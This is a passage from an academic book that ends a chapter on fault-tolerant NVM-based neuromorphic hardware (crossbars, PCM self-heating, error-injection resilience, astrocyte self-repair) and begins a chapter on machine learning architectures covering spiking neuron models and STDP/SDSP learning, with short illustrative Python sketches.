PCM (Nandakumar et al. 2018), Ferroelectric RAM (FeRAM) (Mulaosmanovic
et al. 2017), and STT-/SOT-MRAM (Vincent et al. 2015).
We discuss the reliability implication for NVM-based neuromorphic hardware.
To this end, Fig. 19A and B show a simple feedforward and a recurrent neural
network architecture, respectively. The synaptic weights between the neurons are
implemented using NVMs. In Fig. 19C we illustrate the architecture of a crossbar,
which is the building block of a neuromorphic hardware. A crossbar is a 2D
organization of horizontal wordlines and vertical bitlines. An NVM is integrated at
the intersection of a bitline and a wordline. Finally, in Fig. 20, we illustrate a many-
core design where the crossbar arrays are interconnected using a time-multiplexed
interconnect (Balaji et al. 2019).
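To illustrate the computation a crossbar performs, the following minimal sketch evaluates the bitline currents produced by wordline voltages and NVM conductances; all dimensions and values are illustrative.

    # A minimal sketch of the analog dot-product a crossbar performs: an NVM
    # at each wordline/bitline intersection stores a conductance G[i][j], an
    # input spike raises wordline i to voltage V[i], and bitline j collects
    # current I[j] = sum_i V[i] * G[i][j] (Ohm's and Kirchhoff's laws).

    def crossbar_mvm(voltages, conductances):
        """Ideal crossbar: bitline currents for the given wordline voltages."""
        n_cols = len(conductances[0])
        currents = [0.0] * n_cols
        for v, row in zip(voltages, conductances):
            for j in range(n_cols):
                currents[j] += v * row[j]
        return currents

    G = [[1.0e-6, 2.0e-6],      # 3 wordlines x 2 bitlines; conductances
         [0.5e-6, 1.0e-6],      # encode the synaptic weights
         [2.0e-6, 0.5e-6]]
    V = [0.2, 0.0, 0.2]         # only wordlines 0 and 2 receive spikes
    print(crossbar_mvm(V, G))   # bitline currents in amperes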
For neuromorphic hardware, reliability issues may lead to logic or memory
failures. A logic failure is related to the peripheral logic of a crossbar consisting of
neuron circuitries. A memory failure is related to the NVM devices implementing
synaptic weights. We now elaborate on these issues.
Fig. 21 Operation of an
OxRRAM cell. The left
subfigure shows the LRS
state. The right subfigure
shows the HRS state
Fig. 22 Read disturbances due to structural alteration in an OxRRAM cell. The left subfigure
shows a reduction of the conductive filament gap (i.e., read disturbance of HRS state) on the
application of a stress voltage. The right subfigure shows the lateral growth of the conductive
filament (i.e., read disturbance of LRS state) due to application of a stress voltage
Fig. 23 (a) A phase-change memory (PCM) cell and (b) current needed to SET, RESET, and read
a PCM cell
Fig. 24 Feedback-driven increase of the self-heating temperature of a PCM cell during amor-
phization
using the HD Module, while the PCM resistance is used to compute the Joule
heating in the GST Wj for the programming current Iprog using the JH Module.
The self-heating temperature TSH is computed inside the SH Module using the
Joule heating and the heat dissipation. Finally, the self-heating temperature is used to
compute the crystallization fraction Vc using the CF Module. The iterative process
terminates when the GST is amorphized, i.e., Vc = 0.
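The iterative loop described above can be sketched as follows; the JH, HD, SH, and CF "modules" below are illustrative stand-ins for the material-specific models, and the sketch assumes a programming current large enough to melt the GST.

    # A minimal sketch of the feedback-driven amorphization loop. All
    # constants are illustrative; with too small a programming current the
    # GST would never melt and the loop would not terminate.

    def amorphize(i_prog, r_pcm, t_melt=900.0, t_amb=300.0):
        """Iterate until the GST is fully amorphized, i.e., Vc = 0."""
        vc, t_sh = 1.0, t_amb          # crystallization fraction, temperature
        while vc > 0.0:
            w_j = i_prog ** 2 * r_pcm        # JH Module: Joule heating
            h_d = 0.5 * (t_sh - t_amb)       # HD Module: heat dissipation
            t_sh = t_sh + (w_j - h_d)        # SH Module: self-heating update
            if t_sh > t_melt:                # CF Module: melting shrinks the
                vc = max(0.0, vc - 0.1)      # crystalline fraction
        return t_sh

    print(amorphize(i_prog=1.0, r_pcm=500.0))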
The self-heating temperature of a PCM during amorphization can lead to several
thermal-related issues. First, it can lower the write endurance of the cell, where write
endurance is defined as the number of times a PCM cell can be reliably programmed.
In fact, Titirsha et al. (2021) have shown that endurance exponentially reduces with
an increase in temperature. Second, higher PCM temperatures can lead to the aging
of the CMOS circuitries around the NVM cell.
Neuromorphic systems (AI/ML hardware, in general) are now used in many safety-
critical applications such as monitoring vital physiological data in a healthcare
application and object detection in autonomous vehicles. A fault in such a system
may lead to catastrophic failure. The good news is that machine learning models are
over-parameterized, which means that not every neuron or synaptic failure leads to
output errors. In this section, we first evaluate the built-in error tolerance of
machine learning models. Thereafter, we show how the error tolerance of a model
can be improved by exploiting the self-repair property of the brain.
Fig. 25 Accuracy drop of ResNet and MobileNet with errors injected using the ARES framework (Reagen et al. 2018)
Fig. 26 Fraction of the trained weights that leads to no accuracy drop due to error injection
Figure 25 plots these results for ResNet and MobileNet, two example models. We
make two key observations.
First, not all errors lead to an accuracy drop. This means that deep learning mod-
els are to a certain extent resilient to errors. Second, between ResNet and MobileNet,
MobileNet has fewer synaptic weights that are error-resilient. Therefore, we see a
significant accuracy drop for most errors. For ResNet, we see an accuracy drop only
when an error affects a non-resilient synaptic weight. To further expand on this,
Fig. 26 reports the fraction of trained synaptic weights in the first and last (dense)
layers of seven models that leads to no accuracy drop when a single random error is
injected.
We observe that an average 37% of synaptic weights in the first layer and 30%
in the last layer are resilient to errors. Therefore, these synaptic weights do not need
fault tolerance. The cost of fault tolerance can be reduced by providing solutions for
only the neurons and synapses that lead to an accuracy drop when implemented on
a faulty device. For instance, Liu et al. (2017) propose a methodology to rescue bit
failures in NVM-based neuromorphic hardware in order to restore the computational
accuracy. The design methodology consists of three steps. First, the authors propose to
identify weights of a machine learning model that have a lower impact on accuracy.
Essentially, model weights are categorized into significant and insignificant weights.
Next, the authors propose a retraining algorithm to compensate for single-bit failures
by retuning the trainable weights. Finally, during the mapping step, a redundancy
mapping scheme is used to further improve the computation accuracy.
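A minimal sketch of the first step, assuming a toy single-output layer and an illustrative tolerance, is to flip one bit of each weight in turn and keep only the weights whose perturbation moves the output noticeably.

    # A minimal sketch of weight-significance analysis: flip one bit of each
    # float32 weight (a single-bit failure model) and record which weights
    # change the layer output by more than a tolerance.
    import struct

    def flip_bit(value, bit):
        """Flip one bit of a float32 value via its IEEE 754 encoding."""
        raw = struct.unpack('<I', struct.pack('<f', value))[0]
        return struct.unpack('<f', struct.pack('<I', raw ^ (1 << bit)))[0]

    def layer_out(weights, x):
        return sum(w * xi for w, xi in zip(weights, x))

    def significant_weights(weights, x, tol=0.1, bit=20):
        ref = layer_out(weights, x)
        hits = []
        for i, w in enumerate(weights):
            faulty = list(weights)
            faulty[i] = flip_bit(w, bit)       # inject a single-bit failure
            if abs(layer_out(faulty, x) - ref) > tol:
                hits.append(i)                 # needs protection/retraining
        return hits

    w = [0.5, -0.01, 1.2, 0.003]
    print(significant_weights(w, x=[1.0, 1.0, 1.0, 1.0]))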
Recent works also exploit the self-repair capability of the brain (Parpura et al.
1994). Self-repair is facilitated by restoring the spike firing frequency of a failed
neuron using a closed-loop retrograde feedback signal.
Figure 27 illustrates how an astrocyte regulates the neuronal activity at a synaptic
site using a closed-loop feedback mechanism.
The astrocyte causes a transient increase of intracellular calcium (Ca 2+ ) levels, which
serves as the catalyst for self-repair. Ca 2+ -induced Ca 2+ release (CICR) is the main
mechanism to regulate Ca 2+ in the healthy brain. CICR is triggered by inositol
1,4,5-trisphosphate (I P3 ), which is produced upon astrocyte activation. To describe
the operation of the astrocyte, let δ(t − τ ) be a spike at time τ from the neuron
ni . This spike triggers the release of 2-arachidonyl glycerol (2-AG), a type of
endocannabinoid responsible for stimulating the cytosolic calcium Ca 2+ (cyt). The
quantity of 2-AG produced is governed by the ordinary differential equation (ODE)
$$\frac{dAG}{dt} = \frac{-AG}{\tau_{AG}} + r_{AG}\,\delta(t-\tau), \tag{2}$$
where AG is the quantity of 2-AG, τAG is the rate of decay, and rAG is the rate of
production of 2-AG.
On one pathway, the cytosolic calcium is absorbed by the endoplasmic reticulum
(ER) via the sarcoendoplasmic reticulum Ca 2+ -ATPase (SERCA) pumps, and on the
other pathway, the cytosolic calcium enhances the phospholipase C (PLC) activation
process. This event increases I P3 production and ER intracellular calcium release
via the CICR mechanism.
The intracellular astrocytic calcium dynamics control the glutamate (Glu) release
from the astrocyte, which is governed by
$$\frac{dGlu}{dt} = \frac{-Glu}{\tau_{Glu}} + r_{Glu}\,\delta(t-t_{Ca}), \tag{3}$$
where τGlu is the rate of decay, rGlu is the rate of production of glutamate, and tCa is
time at which Ca 2+ crosses the release threshold. The glutamate generates e-SP, the
indirect signal to the synaptic site. e-SP is related to Glu using the following ODE:
$$\frac{d\,eSP}{dt} = \frac{-eSP}{\tau_{eSP}} + \frac{m_{eSP}}{\tau_{eSP}}\,Glu(t), \tag{4}$$
where τeSP is the decay rate of e-SP and meSP is a scaling factor.
Finally, there exists a direct signaling pathway (DSE) from neuron ni to the
synaptic site. The DSE is given by
$$DSE = -K_{AG}\cdot AG(t), \tag{5}$$
where KAG is a constant. Overall, the synaptic transmission probability (PR) at the
synaptic site is
$$PR(t) = PR(0) + PR(0)\,\frac{DSE(t) + eSP(t)}{100} \tag{6}$$
Fig. 28 Inserting an astrocyte in a neural network. (a) Original network of neurons and synapses.
(b) Astrocyte-modulated neurons and synapses
Conclusion
The increasing prevalence of AI/ML-based systems and the quest for smart things
are expected to drive the growth and innovations in electronic systems for the
next few decades. As we move from isolated smart things toward collective
intelligence, electronic systems are being deployed across varying operating envi-
ronments. Consequently, the reliability requirements are going to vary across
not just application domains but also on each system’s operating environment.
Therefore, designing fault-tolerant architectures forms an indispensable component
of application-specific system design. While the fundamental approaches to fault
tolerance, such as redundancy and diversity, still apply, these approaches need to be
tailored at the system level for emerging technologies. To this end, this chapter pro-
vides an overview of both the essential background and the emerging approaches to
designing fault-tolerant architectures. Additionally, the chapter also provides a brief
overview of state-of-the-art architecture-level methods for fault-tolerant processing.
The scope for related future research primarily includes the design of application-
specific fault tolerance. Novel approaches such as cross-layer reliability and infor-
mation processing factory (Rambo et al. 2019) provide a path for implementing
cost-efficient, dynamically adaptable fault tolerance. Further, the exploration into
leveraging the benefits of newer computing paradigms such as approximate com-
puting and memory-oriented computing for inherently robust applications can result
in fault tolerance with reduced overheads.
References
Adday GH, Subramaniam SK, Zukarnain ZA, Samian N (2022) Fault tolerance structures in
wireless sensor networks (WSNs): survey, classification, and future directions. Sensors 22(16).
https://doi.org/10.3390/s22166041
Austin TM (1999) DIVA: a reliable substrate for deep submicron microarchitecture design.
In: MICRO-32. Proceedings of the 32nd Annual ACM/IEEE International Symposium on
Microarchitecture, pp 196–207. https://doi.org/10.1109/MICRO.1999.809458
Avizienis A, Laprie J, Randell B, Landwehr C (2004) Basic concepts and taxonomy of dependable
and secure computing. IEEE Trans Depend Secure Comput 1(1):11–33. https://doi.org/10.1109/TDSC.2004.2
Arzt E, Kraft O, Sanchez JE, Bader S, Nix WD (1992) Electromigration resistance and mechanical
strength
Balaji A, Wu Y, Das A, Catthoor F, Schaafsma S (2019) Exploration of segmented bus as scalable
global interconnect for neuromorphic computing. In: GLSVLSI
Bar-El H, Choukri H, Naccache D, Tunstall M, Whelan C (2006) The sorcerer's apprentice guide
to fault attacks. Proc IEEE 94(2):370–382. https://doi.org/10.1109/JPROC.2005.862424
Baraza J, Gracia J, Gil D, Gil P (2002) A prototype of a VHDL-based fault injection
tool: description and application. J Syst Architect 47(10):847–867.
https://doi.org/10.1016/S1383-7621(01)00036-4
Biasielli M, Bolchini C, Cassano L, Mazzeo A, Miele A (2022) Approximation-based fault
tolerance in image processing applications. IEEE Trans Emerg Top Comput 10(2):648–661.
https://doi.org/10.1109/TETC.2021.3100623
Binder D, Smith EC, Holman AB (1975) Satellite anomalies from galactic cosmic rays. IEEE
Trans Nucl Sci 22(6):2675–2680. https://doi.org/10.1109/TNS.1975.4328188
Blaauw D, Kalaiselvan S, Lai K, Ma W, Pant S, Tokunaga C, Das S, Bull D (2008) Razor II: in situ
error detection and correction for PVT and SER tolerance. In: 2008 IEEE International Solid-
State Circuits Conference – Digest of Technical Papers, pp 400–622.
https://doi.org/10.1109/ISSCC.2008.4523226
Carter NP, Naeimi H, Gardner DS (2010) Design techniques for cross-layer resilience. In: 2010
Design, Automation Test in Europe Conference Exhibition (DATE 2010), pp 1023–1028.
https://doi.org/10.1109/DATE.2010.5456960
Chen PM, Lee EK, Gibson GA, Katz RH, Patterson DA (1994) RAID: high-performance, reliable
secondary storage. ACM Comput Surv 26(2):145–185. https://doi.org/10.1145/176979.176981
Cheng E, Mirkhani S, Szafaryn LG, Cher CY, Cho H, Skadron K, Stan MR, Lilja K, Abraham JA,
Bose P, Mitra S (2016) CLEAR: cross-layer exploration for architecting resilience – combining
hardware and software techniques to tolerate soft errors in processor cores. In: Proceedings of
the 53rd Annual Design Automation Conference, DAC'16. ACM, New York, pp 68:1–68:6.
https://doi.org/10.1145/2897937.2897996
Cho H, Cheng E, Shepherd T, Cher CY, Mitra S (2017) System-level effects of soft errors in uncore
components. IEEE Trans Comput-Aided Design Integr Circuits Syst 36(9):1497–1510.
https://doi.org/10.1109/TCAD.2017.2651824
Slegel TJ, Averill RM, Check MA, Giamei BC, Krumm BW, Krygowski CA, Li WH, Liptay JS,
MacDougall JD, McPherson TJ, Navarro JA, Schwarz EM, Shum K, Webb CF (1999) IBM's
S/390 G5 microprocessor design. IEEE Micro 19(2):12–23. https://doi.org/10.1109/40.755464
Sorin DJ (2009) Fault tolerant computer architecture. Synthesis Lectures on Computer Architecture 4(1):1–104
Srinivasan S, Krishnan R, Mangalagiri P, Xie Y, Narayanan V, Irwin MJ, Sarpatwari K (2008)
Toward increasing FPGA lifetime. IEEE Trans Depend Secure Comput 5(2):115–127.
https://doi.org/10.1109/TDSC.2007.70235
Titirsha T, Song S, Das A, Krichmar J, Dutt N, Kandasamy N, Catthoor F (2022) Endurance-aware
mapping of spiking neural networks to neuromorphic hardware. TPDS 33(2):288–301.
https://doi.org/10.1109/TPDS.2021.3065591
Varshika ML, Corradi F, Das A (2022) Nonvolatile memories in spiking neural network
architectures: current and emerging trends. Electronics 11(10):1610.
https://doi.org/10.3390/electronics11101610
Vihman L, Kruusmaa M, Raik J (2020) Data-driven cross-layer fault management architecture
for sensor networks. In: 2020 16th European Dependable Computing Conference (EDCC), pp
33–40. https://doi.org/10.1109/EDCC51268.2020.00015
Vincent AF, Larroque J, Locatelli N, Romdhane NB, Bichler O, Gamrat C, Zhao WS, Klein JO,
Galdin-Retailleau S, Querlioz D (2015) Spin-transfer torque magnetic memory as a stochastic
memristive synapse for neuromorphic systems. TBCAS 9(2):166–174.
https://doi.org/10.1109/TBCAS.2015.2414423
Wang Z, Chattopadhyay A (2017) High-level estimation and exploration of reliability for
multi-processor system-on-chip. Springer. https://link.springer.com/book/10.1007/978-981-10-1073-6
Wang Z, Li R, Chattopadhyay A (2013) Opportunistic redundancy for improving reliability of
embedded processors. In: 2013 8th IEEE Design and Test Symposium, pp 1–6.
https://doi.org/10.1109/IDT.2013.6727090
Wang Z, Paul G, Chattopadhyay A (2014) Processor design with asymmetric reliability. In: 2014
IEEE Computer Society Annual Symposium on VLSI, pp 565–570.
https://doi.org/10.1109/ISVLSI.2014.63
Wang Z, Karakonstantis G, Chattopadhyay A (2016) A low overhead error confinement method
based on application statistical characteristics. In: 2016 Design, Automation & Test in Europe
Conference & Exhibition (DATE), pp 1168–1171
Wirthlin MJ, Keller AM, McCloskey C, Ridd P, Lee D, Draper J (2016) SEU mitigation and
validation of the LEON3 soft processor using triple modular redundancy for space processing.
In: Proceedings of the 2016 ACM/SIGDA International Symposium on Field-Programmable
Gate Arrays, FPGA '16. ACM, New York, pp 205–214. https://doi.org/10.1145/2847263.2847278
Wulf WA, McKee SA (1995) Hitting the memory wall: implications of the obvious. SIGARCH
Comput Archit News 23(1):20–24. https://doi.org/10.1145/216585.216588
Xiang Y, Chantem T, Dick RP, Hu XS, Shang L (2010) System-level reliability modeling for
MPSoCs. In: 2010 IEEE/ACM/IFIP International Conference on Hardware/Software Codesign
and System Synthesis (CODES+ISSS), pp 297–306
Yoon DH, Erez M (2010) Virtualized and flexible ECC for main memory. In: Proceedings of
the Fifteenth Edition of ASPLOS on Architectural Support for Programming Languages and
Operating Systems, ASPLOS XV. ACM, New York, pp 397–408.
https://doi.org/10.1145/1736020.1736064
Yuan G, Liao Z, Ma X, Cai Y, Kong Z, Shen X, Fu J, Li Z, Zhang C, Peng H, et al. (2021) Improving
DNN fault tolerance using weight pruning and differential crossbar mapping for ReRAM-based
edge AI. In: ISQED
Architectures for Machine Learning
10
Yongkui Yang, Chao Chen, and Zheng Wang
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 322
Architectures for Neuromorphic Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 324
Biological Computing Models and Learning Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 324
Microarchitecture for Neuromorphic Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 330
Circuit-Level Design Considerations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 335
Prominent Neuromorphic Chips . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
SpiNNaker . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
Neurogrid . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 344
BrainScales . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 345
LaCSNN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 345
TrueNorth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346
Loihi . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 347
ODIN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348
Tianjic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348
Architectures for Artificial Neural Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 349
Design Metrics for ANN Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 350
Design Abstractions and Trade-Offs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 355
Selective ANN Architectures and Circuits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 357
Architectures for Classic Machine Learning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 370
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372
Abstract
The term “artificial intelligence (AI)” was coined in 1956, and its development
has undergone periods of extreme hype and periods of strong disillusionment
since then. Today, AI has received tremendous attention from both academia
and industry, and it will remain one of the hottest topics in the foreseeable
future. A subset of AI named machine learning (ML) has achieved great success
throughout a huge variety of fields, such as computer vision, natural language
processing, and computer gaming. ML was first proposed to endow machine the
ability to imitate the learning process of the human brain using neuromorphic
models. However, the modelling complexity and limited computing capabilities
of machines hindered the development of ML in its early days. Benefiting
from the ever-growing computing power and availability of digital data, ML
has adopted both bio-inspired spiking neural network (SNN), or neuromorphic
computing, and practical artificial neural network (ANN), which have become
two of the top trending methods with outstanding results.
This chapter gives a brief overview of the state-of-the-art architectures and
circuits for ML. On the one hand, neuromorphic computing architectures
and accelerators are investigated, including bio-inspired computational models
and learning methods, microarchitecture, circuit-level design considerations, and
prominent neuromorphic chips. On the other hand, architectures for ANNs are
outlined, including essential design metrics on ANN accelerators and various
state-of-the-art ANN architectures and circuits.
Introduction
Artificial intelligence (AI) is, and will remain, one of the hottest topics for
mankind. However, enthusiasm for AI research declined significantly before the
millennium, a period known as the "AI winter." Despite many reasons for
such pessimism, the increased gap between the successful mathematical methods
and the difficulty of their deployment in the infrastructures was one of the root
causes. Particularly, AI methods generally thirst for huge computing power, which
was unable to be met in those days. Fortunately, interest and investment in AI
boomed again in the first decade of the twenty-first century, which is largely attributed
to the advancement of semiconductor technology and computer architectures. The
intrinsic architectural parallelism and increased operating frequency in modern
computers met the high demands on the computing power of the previously invented
AI methods, especially for a subset of AI named machine learning.
Machine learning is referred to as “the study of computer algorithms that improve
automatically through experience” (Mitchell 1997), which was initially proposed
10 Architectures for Machine Learning 323
to let the machine imitate the learning procedure of the human brain. Therefore,
neuroscientists pioneered research on the connectivity and the structural and
functional organization of the cerebrum and reached the consensus that the neuron
is the primitive element of the brain and that the signals transmitted among neurons
are temporally discrete electrical potentials known as "spikes." This has given
the intuition that machines with learnability should be best designed following
the brain’s working principle, which opens the research field of bio-inspired or
neuromorphic computing. The first part of this chapter introduces the bio-inspired
computational models and learning methods, followed by their architectural and
circuit-level design considerations, and surveys prominent neuromorphic chips.
Nonetheless, the current biological neuron model is not yet precise, and the
topology of neurons’ interconnection is still under investigation. Computer scientists
proposed simplified neuron models and networks, namely, artificial neural network
(ANN), to solve application-oriented problems and have achieved tremendous suc-
cess in computer vision, natural language processing, and computer gaming. Instead
of asynchronous spike signals in neuromorphic computing, artificial neurons in
ANN process real values synchronously. After the year 2010, ANN has aggressively
grown larger and deeper with diverse computing patterns, which is also known as
"deep learning." ANN offers an alternative but more practical solution to endow
machines with intelligence; therefore, its applications are prevalent from
embedded devices to high-end servers. However, conventional central processing
units (CPUs) are incapable of accelerating ANN's huge and parallel structure, whereas
graphical processing units (GPUs) demonstrate poor energy efficiency and are hence
uneconomical. To address this, customized ANN accelerators have been prototyped
from the year 2014 and have since been heavily researched. Companies such as NVIDIA,
Intel, and Google have all fabricated their ANN accelerators for both inference and
training and built various services on top. The second part of this chapter aims to
provide essential design metrics on ANN accelerators and surveys on state-of-the-
art ANN architectures and circuits.
Neuromorphic and ANN computing are far from defining the vast scope of
architectures for machine learning. Classic machine learning algorithms such as
support vector machine (SVM), and K-means, principal component analysis (PCA)
are widely adopted as functional kernels executing on CPU, whereas dedicated
architectures for those are relatively less explored. Due to the large volume of
published works, it is impractical to collect all designs and achieve absolute
exactness throughout this chapter. Nevertheless, we intend to provide a quick guide
for the readers and target continuous updates. As illustrated in Fig. 1, we categorize
machine learning architectures based on their implementing algorithms into bio-
inspired SNN, practical ANN, and classic ML designs. In this chapter, we first
illustrate SNN computing models and architectures. Afterwards, we explain design
metrics and present selective architectures for ANN. A brief overview on the designs
for classic machine learning is also discussed.
There are three main differences in computing principles between the brain
and ANN accelerators. First, the ANN processes information in precise multi-bit
values, while the brain processes spikes or events. Second, computation (i.e., the
neurons) and storage (i.e., the synapses) are co-located in the brain. By contrast,
the computation and storage in the ANN accelerator are separated. Third, the
connectivity of neurons in the brain is three-dimensional, which is much more
massive than that of the ANN accelerator.
Different neuron and synapse models have been proposed to describe the biolog-
ical behaviors at different levels of biological plausibility, while neuromorphic
computing needs to mimic only the key parts that are essential for computation.
A typical neuromorphic computing model is shown in Fig. 4.
Fig. 4 Typical neuromorphic computing model
$$\tau \frac{dV_{mem}}{dt} = \sum_i V_i w_i - (V_{mem} - V_{rest}), \qquad V_{mem} = V_{rest}\ \text{if } V_{mem} \ge V_{thresh} \tag{1}$$
where Vrest, Vthresh, and τ are the membrane's resting potential, threshold, and
time-constant, respectively, and wi is the weight of the synapse. The dynamics of LIF-
spiking neurons are shown in Fig. 5. Vi is the input synaptic voltage (the value
is binary, where 1 and 0 indicate that a fired spike is received and that no spike
is received, respectively), and the weighted inputs are summed until the neuron generates a
spike when the membrane potential crosses the threshold Vthresh. A refractory period
follows spike generation, during which the membrane potential is kept
at the resting potential Vrest, and the input voltage Vi is not integrated during this
refractory period. This LIF model exhibits three neuro-computational properties,
i.e., tonic spiking, class 1 excitable, and integrator.
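A minimal sketch of these LIF dynamics, using forward-Euler integration of Equation (1) with illustrative constants, is shown below.

    # A minimal sketch of LIF dynamics: weighted binary input spikes
    # accumulate on the membrane, the potential leaks toward V_rest, and a
    # threshold crossing produces a spike followed by a refractory period.

    def simulate_lif(spike_trains, weights, v_rest=0.0, v_thresh=1.0,
                     tau=5.0, dt=1.0, refractory=3):
        v, ref, out = v_rest, 0, []
        for spikes_in in spike_trains:
            if ref > 0:                    # inputs ignored while refractory
                ref -= 1
                out.append(0)
                continue
            syn = sum(w for s, w in zip(spikes_in, weights) if s)
            v += dt / tau * (syn - (v - v_rest))   # Equation (1), Euler step
            if v >= v_thresh:
                v, ref = v_rest, refractory        # reset, start refractory
                out.append(1)
            else:
                out.append(0)
        return out

    # Three synapses driven by the same periodic input spikes.
    print(simulate_lif([(1, 1, 0)] * 20, weights=(2.0, 2.0, 1.0)))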
The QIF model, which is also known as the theta-neuron, has higher biological
plausibility than LIF but also a higher hardware implementation cost. The QIF
model can be presented as Equation (2). Compared to LIF, the QIF model exhibits
more neuro-computational properties like spike latency, threshold variability, and
bistability of resting states.
$$\tau \frac{dV_{mem}}{dt} = \sum_i V_i w_i - \alpha\,(V_{mem} - V_{rest})(V_{mem} - V_{thresh}), \qquad V_{mem} = V_{rest}\ \text{if } V_{mem} \ge V_{thresh} \tag{2}$$
Fig. 5 The dynamics of LIF-spiking neurons
where mV stands for millivolt and U represents a membrane recovery variable that
provides negative feedback to membrane potential Vmem . With different values of
parameters a, b, Vrest , and d, this model exhibits different firing patterns. When the
membrane potential Vmem reaches 30 mV, Vmem and U are reset to Vrest and U + d,
respectively.
Synapse Models The fired spikes in the presynaptic neuron transit to the postsynaptic
neuron through synapses. In a neuromorphic computing accelerator, if the system
does not attempt to explicitly model synaptic biological behavior such as the plasticity
mechanism, the synapses are represented as scalar values, or weights, stored in memory.
Accelerators without the plasticity mechanism are not able to do training or learning.
To mimic the learning mechanism of the brain, the synapse model has to capture
synaptic biological behavior such as the plasticity mechanism, which modifies the
synapse's strength or weight value over time. One of the most used synapse models
with a plasticity mechanism is spike-timing-dependent plasticity (STDP), and this biological
behavior has been observed around the year 1998 (Bi and Poo 1998). Specifically,
the weight of the synapse increases, or is strengthened ("potentiated" in neuroscience
terminology), if the spike fired by the presynaptic neuron arrives within
a certain time window before the spike generation of the postsynaptic neuron. On
the contrary, the weight of the synapse decreases, or is weakened ("depressed" in
neuroscience terminology), if the spike fired by the presynaptic neuron arrives
within a certain time window after the spike generation of the postsynaptic
neuron. STDP is also known as an unsupervised learning method in neuromorphic
computing, and more details about STDP are described in the next paragraph
on learning methods.
Learning Methods Currently, the effective learning or training methods for SNN
are spike-based supervised, unsupervised, and semi-supervised methods. For the
supervised learning methods, the data fed to SNN for training should be labeled.
ReSuMe, tempotron, and backpropagation are the typical spike-based supervised
learning methods. While inspired by the brain, the STDP-based algorithm is one
of the most used unsupervised learning methods. Semi-supervised methods, such
as spike-driven synaptic plasticity (SDSP), are less complex to implement
than STDP. Supervised learning methods such as ReSuMe and tempotron can train
an SNN with a single layer, but such single-layer methods are not effective for
complex neuromorphic computing like multilayer SNNs. Spike-based
backpropagation algorithm enables supervised learning for multilayer SNN, and
it has been widely used for feedforward SNNs. Similar to the backpropagation
in feedforward ANNs, the spike-based backpropagation algorithm (as shown in
Fig. 6) backpropagates the computed gradient for the weights of the network for
a single input-output example (here is spike train). However, unlike the ANN, the
fired spikes in SNN are non-differentiable due to their discontinuity. To overcome this
difficulty, most works, such as SpikeProp (Bohte et al. 2002), Multi-SpikeProp
(Ghosh-Dastidar and Adeli 2009), and NormAD (Anwani and Rajendran 2015),
estimate a differentiable approximate function for the spikes, and thus, the gradient
descent can be performed.
The bio-inspired STDP-based learning method is a temporally asymmetric
form of the Hebbian learning rule, where the weight of a synapse is updated based
on the relative timing of the presynaptic and postsynaptic spikes.
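A minimal sketch of a pair-based STDP update, using the common exponential time window with illustrative constants, is shown below.

    # A minimal sketch of pair-based STDP: a presynaptic spike shortly
    # *before* a postsynaptic one potentiates the synapse, and one shortly
    # *after* it depresses the synapse.
    import math

    def stdp_dw(t_pre, t_post, a_plus=0.05, a_minus=0.055,
                tau_plus=20.0, tau_minus=20.0):
        dt = t_post - t_pre
        if dt > 0:        # causal pairing: potentiation
            return a_plus * math.exp(-dt / tau_plus)
        return -a_minus * math.exp(dt / tau_minus)   # anti-causal: depression

    print(stdp_dw(t_pre=10.0, t_post=15.0))   # > 0: weight strengthened
    print(stdp_dw(t_pre=15.0, t_post=10.0))   # < 0: weight weakened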
Other STDP variants with model reduction such as SDSP have also been studied.
The illustration of the SDSP-based learning method is shown in Fig. 8 and the
synaptic weight updates follow Equation (5). Here, a and b are
jump sizes, θm is the voltage threshold, and θ1 , θ2 , and θ3 are the thresholds on the
calcium variable. Different from the STDP learning method that relies on the relative
presynaptic neuron and postsynaptic neuron spike times, the SDSP learning method
updates the weight each time when a presynaptic neuron spike occurs. The synaptic
weight increases if the membrane potential at the time of presynaptic neuron spike
Vmem(tpre) is larger than the threshold θm and the calcium concentration Ca(tpre)
at the time of the presynaptic neuron spike is between θ1 and θ3, while the synaptic
weight decreases by b at the time of the presynaptic neuron spike if Vmem(tpre)
is smaller than the threshold θm and Ca(tpre) is between θ1 and θ2.
$$\Delta w = \begin{cases} +a, & \text{if } V_{mem}(t_{pre}) \ge \theta_m \text{ and } \theta_1 \le Ca(t_{pre}) < \theta_3 \\ -b, & \text{if } V_{mem}(t_{pre}) < \theta_m \text{ and } \theta_1 \le Ca(t_{pre}) < \theta_2 \end{cases} \tag{5}$$
